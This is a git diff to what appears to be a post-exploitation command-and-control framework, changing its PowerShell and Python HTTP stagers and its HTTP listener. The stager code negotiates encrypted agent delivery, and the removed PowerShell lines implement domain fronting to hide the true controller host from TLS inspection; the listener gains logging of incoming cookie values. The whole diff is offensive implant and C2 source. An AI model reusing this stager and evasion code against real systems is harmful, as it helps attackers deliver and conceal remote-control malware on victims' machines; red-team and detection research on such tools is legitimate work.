diff --git a/data/agent/stagers/http.ps1 b/data/agent/stagers/http.ps1
index 12f43ba..594d134 100644
--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@@ -211,21 +211,7 @@ function Start-Negotiate {
     $rc4p2 = ConvertTo-RC4ByteStream -RCK $($IV2+$SKB) -In $data2;
     $rc4p2 = $IV2 + $rc4p2 + $eb2;
 
-    # the User-Agent always resets for multiple calls...silly
-    if ($customHeaders -ne "") {
-        $headers = $customHeaders -split ',';
-        $headers | ForEach-Object {
-            $headerKey = $_.split(':')[0];
-            $headerValue = $_.split(':')[1];
-            #If host header defined, assume domain fronting is in use and add a call to the base URL first
-            #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
-            if ($headerKey -eq "host"){
-                try{$ig=$WC.DownloadData($s)}catch{};
-            }
-
-            $wc.Headers.Add($headerKey, $headerValue);
-        }
-    }
+    # UA resets for every call with net.webclient
     $wc.Headers.Add("User-Agent",$UA);
 
     # step 5 of negotiation -> client posts nonce+sysinfo and requests agent
diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py
index 4a9579a..3541774 100644
--- a/data/agent/stagers/http.py
+++ b/data/agent/stagers/http.py
@@ -48,12 +48,9 @@ for headerRaw in headersRaw:
     try:
         headerKey = headerRaw.split(":")[0]
         headerValue = headerRaw.split(":")[1]
-        if headerKey.lower() == "cookie":
-            headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
-        else:
-            headers[headerKey] = headerValue
-    except:
-        pass
+        headers[headerKey] = headerValue
+    except Exception as e:
+        print e
 
 # stage 3 of negotiation -> client generates DH key, and POSTs HMAC(AESn(PUBc)) back to server
 clientPub = DiffieHellman()
diff --git a/lib/listeners/http.py b/lib/listeners/http.py
index 5628659..ed6a4d9 100644
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -1128,6 +1128,30 @@ def send_message(packets=None):
             })
             dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
 
+            listenerName = self.options['Name']['Value']
+            try:
+                cookie = request.headers.get('Cookie')
+                if cookie and cookie != '':
+
+                    # see if we can extract the 'routing packet' from the specified cookie location
+                    # NOTE: this can be easily moved to a paramter, another cookie value, etc.
+                    
+                    message = "[*] POST cookie value from {} : {}".format(clientIP, cookie)
+                    signal = json.dumps({
+                        'print': False,
+                        'message': message
+                    })
+                    dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
+                
+            except Exception as e:
+                
+                message = "[!] Error retrieving cookie value from {}: {}".format(clientIP, e)
+                signal = json.dumps({
+                    'print': False,
+                    'message': message
+                })
+                dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
+
             # the routing packet should be at the front of the binary request.data
             #   NOTE: this can also go into a cookie/etc.
             dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)